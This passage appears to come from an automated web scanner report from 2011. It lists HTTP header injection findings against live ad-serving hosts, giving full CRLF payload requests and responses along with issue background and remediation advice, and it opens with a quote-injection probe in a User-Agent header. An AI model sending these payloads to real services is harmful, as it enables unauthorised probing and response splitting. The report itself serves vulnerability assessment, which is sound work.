GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding Content-Length: 42 Connection: close Content-Type: text/plain
XML-RPC server accepts POST requests only.
2. HTTP header injection
There are 29 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/586bb
9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29:
Date: Sun, 09 Jan 2011 02:03:07 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3913f 3c0a349169b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:08 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1e05c%0d%0a76a123a846/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1e05c 76a123a846/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632: Date: Sun, 09 Jan 2011 02:03:09 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6a67f 245da988542/scrabble.pogo/load: Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6c29f 119f9246290/scrabble.pogo/room%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D326364: Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5f927%0d%0a372c17095f9/N5621.148484.0233710364621/B4682144 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5f927 372c17095f9/N5621.148484.0233710364621/B4682144: Date: Sun, 09 Jan 2011 02:03:16 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2379a cb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http: //r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn%3D64 Date: Sun, 09 Jan 2011 02:03:04 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31153 afba1dd703b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:02:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1329b 901e1fb73e9/home.pogo/spotlight: Date: Sun, 09 Jan 2011 02:02:57 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1ee0e%0d%0a014a1f82eea/pand.default/prod.backstage HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1ee0e 014a1f82eea/pand.default/prod.backstage: Date: Sun, 09 Jan 2011 02:02:52 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /11083%0d%0a8a9bf6293f5/pand.default/prod.community;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=728x90;tile=1;ord=1294536983566535667 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536983566535667&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/11083 8a9bf6293f5/pand.default/prod.community%3Bag%3D0%3Bgnd%3D0%3Bhours%3D0%3Bcomped%3D0%3Bfb%3D0%3Bdma%3D0%3Bclean%3D0%3Bspgs%3D0%3Bu%3Dag%2A0%21gnd%2A0%21hours%2A0%21comped%2A0%21fb%2A0%21dma%2A0%21clean%2A0%21spgs%2A0%3Bsz%3D728x90%3Btile%3D1%3Bord%3D1294536983566535667: Date: Sun, 09 Jan 2011 02:01:35 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31be3 d74a84518d3/prize.pogo/prizes%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D780687: Date: Sun, 09 Jan 2011 02:02:08 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8b770 b65cef34867/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319: Date: Sun, 09 Jan 2011 02:02:16 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4a418 c5139b784f3/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/12804 48b5790cf88/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/13037 fced369b2cc/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/556e1 2fda3d0e5cf/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632: Date: Sun, 09 Jan 2011 02:03:25 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/66506 cee2014b2d9/prize.pogo/prizes: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/79e85 73d9c50a5a7/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319: Date: Sun, 09 Jan 2011 02:03:35 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/877c2 03fa4dd3a61/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/64dc6 e88543e460e/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0%0d%0a6b6ad7cf9b8; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e%0d%0a91a63bf7646; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=73be8%0d%0adc5e96035d9&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=729cd%0d%0a9fe4d8fa7d8 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=92f47%0d%0a539632693e7&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
